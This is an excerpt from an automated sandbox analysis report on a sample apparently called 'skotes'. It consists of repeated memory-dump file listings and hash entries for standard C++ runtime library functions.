                                                          • Associated: 00000006.00000002.2683784418.0000000000E19000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683811997.0000000000E2B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683848149.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683876756.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683898524.0000000000E34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683921446.0000000000E42000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683943913.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683967721.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683989544.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684012086.0000000000E57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684035267.0000000000E5F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684065002.0000000000E66000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684095310.0000000000E67000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684120262.0000000000E70000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684145634.0000000000E72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684145634.0000000000EAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684228696.0000000000EDC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684252362.0000000000EDD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684279870.0000000000EDE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684300666.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684326349.0000000000EE6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685567728.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685629752.0000000000EF3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685676912.0000000000EF4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685709596.0000000000EF5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_be0000_skotes.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _strrchr
                                                          • String ID:
                                                          • API String ID: 3213747228-0
                                                          • Opcode ID: c90ae3db66b5619743134332522a0b96de832b73a835be1452314c5289bd2e52
                                                          • Instruction ID: ae653f2904145b69ab52663abb2b4fb7e3edd65935fe92c1210b3776c40d0dfd
                                                          • Opcode Fuzzy Hash: c90ae3db66b5619743134332522a0b96de832b73a835be1452314c5289bd2e52
                                                          • Instruction Fuzzy Hash: 67B145329402959FDB11DF28C8D17EEBBE5EF46340F1441AAF855EB241D6349E82EBA0
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.2680593860.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true
                                                          • Associated: 00000006.00000002.2678989522.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680593860.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680755296.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680797474.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680822841.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681757009.0000000000DB1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681801830.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681834666.0000000000DC5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681856278.0000000000DC7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681883007.0000000000DC8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681883007.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681947828.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681971967.0000000000DDC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682002825.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682032299.0000000000DE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682056125.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682146225.0000000000DEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682667892.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682717847.0000000000E03000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683732040.0000000000E0B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683784418.0000000000E19000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683811997.0000000000E2B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683848149.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683876756.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683898524.0000000000E34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683921446.0000000000E42000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683943913.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683967721.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683989544.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684012086.0000000000E57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684035267.0000000000E5F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684065002.0000000000E66000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684095310.0000000000E67000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684120262.0000000000E70000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684145634.0000000000E72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684145634.0000000000EAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684228696.0000000000EDC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684252362.0000000000EDD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684279870.0000000000EDE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684300666.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684326349.0000000000EE6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685567728.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685629752.0000000000EF3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685676912.0000000000EF4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685709596.0000000000EF5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_be0000_skotes.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: __alloca_probe_16__freea
                                                          • String ID:
                                                          • API String ID: 1635606685-0
                                                          • Opcode ID: 5d58fa7ce929fae245f7d05b5c9c5b2285effc267a29335a489f843fe9b419d8
                                                          • Instruction ID: c9cc240148f5b2e9dfafc7ec31adb1efd25856dff3bab1fdf664ec1bdb91063b
                                                          • Opcode Fuzzy Hash: 5d58fa7ce929fae245f7d05b5c9c5b2285effc267a29335a489f843fe9b419d8
                                                          • Instruction Fuzzy Hash: 2B81E572D0026A9BDF209F65A881EEF7BB5EF09314F184055E864B7681EB31CD44EBB0
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.2680593860.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true
                                                          • Associated: 00000006.00000002.2678989522.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680593860.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680755296.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680797474.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680822841.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681757009.0000000000DB1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681801830.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681834666.0000000000DC5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681856278.0000000000DC7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681883007.0000000000DC8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681883007.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681947828.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681971967.0000000000DDC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682002825.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682032299.0000000000DE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682056125.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682146225.0000000000DEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682667892.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682717847.0000000000E03000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683732040.0000000000E0B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683784418.0000000000E19000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683811997.0000000000E2B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683848149.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683876756.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683898524.0000000000E34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683921446.0000000000E42000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683943913.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683967721.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683989544.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684012086.0000000000E57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684035267.0000000000E5F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684065002.0000000000E66000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684095310.0000000000E67000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684120262.0000000000E70000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684145634.0000000000E72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684145634.0000000000EAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684228696.0000000000EDC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684252362.0000000000EDD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684279870.0000000000EDE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684300666.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684326349.0000000000EE6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685567728.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685629752.0000000000EF3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685676912.0000000000EF4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685709596.0000000000EF5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_be0000_skotes.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AdjustPointer
                                                          • String ID:
                                                          • API String ID: 1740715915-0
                                                          • Opcode ID: db00f749c989db083072d8c9360b3c405d116fe1bf0f381c0dbbf7437b626f4d
                                                          • Instruction ID: 0987d38b83c156293d6b3d28be812a21e9a6c46dfe087489d4a6781fbf6608ac
                                                          • Opcode Fuzzy Hash: db00f749c989db083072d8c9360b3c405d116fe1bf0f381c0dbbf7437b626f4d
                                                          • Instruction Fuzzy Hash: F951E172A01A05EFDB268F54D841BFE73B5EF96300F244529E81147290E771AED1F790
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.2680593860.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true
                                                          • Associated: 00000006.00000002.2678989522.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680593860.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680755296.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680797474.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680822841.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681757009.0000000000DB1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681801830.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681834666.0000000000DC5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681856278.0000000000DC7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681883007.0000000000DC8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681883007.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681947828.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681971967.0000000000DDC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682002825.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682032299.0000000000DE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682056125.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682146225.0000000000DEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682667892.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682717847.0000000000E03000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683732040.0000000000E0B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683784418.0000000000E19000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683811997.0000000000E2B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683848149.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683876756.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683898524.0000000000E34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683921446.0000000000E42000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683943913.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683967721.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683989544.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684012086.0000000000E57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684035267.0000000000E5F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684065002.0000000000E66000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684095310.0000000000E67000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684120262.0000000000E70000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684145634.0000000000E72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684145634.0000000000EAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684228696.0000000000EDC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684252362.0000000000EDD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684279870.0000000000EDE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684300666.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684326349.0000000000EE6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685567728.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685629752.0000000000EF3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685676912.0000000000EF4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685709596.0000000000EF5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_be0000_skotes.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: EqualOffsetTypeids
                                                          • String ID:
                                                          • API String ID: 1707706676-0
                                                          • Opcode ID: 7eba31bc2cdc899ce0d39c1d43e6a64f477002fbbb014f00cff841445868ded1
                                                          • Instruction ID: 8b8273392fd68035d939c1b7105fd3db2ffbf958a22d48ab6cf292db20569dff
                                                          • Opcode Fuzzy Hash: 7eba31bc2cdc899ce0d39c1d43e6a64f477002fbbb014f00cff841445868ded1
                                                          • Instruction Fuzzy Hash: C151DD75E0420A8FCF18DF68D4806EEBBF5EF06314F14448AE860A7350C732AE85EB90
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.2680593860.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true
                                                          • Associated: 00000006.00000002.2678989522.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680593860.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680755296.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680797474.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680822841.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681757009.0000000000DB1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681801830.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681834666.0000000000DC5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681856278.0000000000DC7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681883007.0000000000DC8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681883007.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681947828.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681971967.0000000000DDC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682002825.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682032299.0000000000DE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682056125.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682146225.0000000000DEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682667892.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682717847.0000000000E03000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683732040.0000000000E0B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683784418.0000000000E19000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683811997.0000000000E2B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683848149.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683876756.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683898524.0000000000E34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683921446.0000000000E42000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683943913.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683967721.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683989544.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684012086.0000000000E57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684035267.0000000000E5F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684065002.0000000000E66000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684095310.0000000000E67000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684120262.0000000000E70000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684145634.0000000000E72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684145634.0000000000EAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684228696.0000000000EDC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684252362.0000000000EDD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684279870.0000000000EDE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684300666.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684326349.0000000000EE6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685567728.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685629752.0000000000EF3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685676912.0000000000EF4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685709596.0000000000EF5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_be0000_skotes.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Mtx_unlock$Cnd_broadcastCurrentThread
                                                          • String ID:
                                                          • API String ID: 3264154886-0
                                                          • Opcode ID: 4c00cb92a7d00ee8c6104d894a17f866d31dc60e67713e03bb6e5708a545d0cb
                                                          • Instruction ID: e4c7d4e8b6e22792d80ccb2a2d57bc2fa8c915390984253bc0416833c40889e7
                                                          • Opcode Fuzzy Hash: 4c00cb92a7d00ee8c6104d894a17f866d31dc60e67713e03bb6e5708a545d0cb
                                                          • Instruction Fuzzy Hash: 7441E3B0901209AFDB20DF65C944B6ABBF8FF14720F0045A9E916D7781EB35EA08CBC1
                                                          APIs
                                                          • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 00C0DB64
                                                            • Part of subcall function 00C08F2F: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 00C08F50
                                                          • Concurrency::details::InternalContextBase::FindWorkForBlockingOrNesting.LIBCONCRT ref: 00C0DBC3
                                                          • Concurrency::details::InternalContextBase::PrepareForUse.LIBCONCRT ref: 00C0DBE9
                                                          • Concurrency::location::_Assign.LIBCMT ref: 00C0DC56
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.2680593860.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true
                                                          • Associated: 00000006.00000002.2678989522.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680593860.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680755296.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680797474.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680822841.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681757009.0000000000DB1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681801830.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681834666.0000000000DC5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681856278.0000000000DC7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681883007.0000000000DC8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681883007.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681947828.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681971967.0000000000DDC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682002825.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682032299.0000000000DE6000.00000040.00000001.01000000.00000007.sdmpDownload File
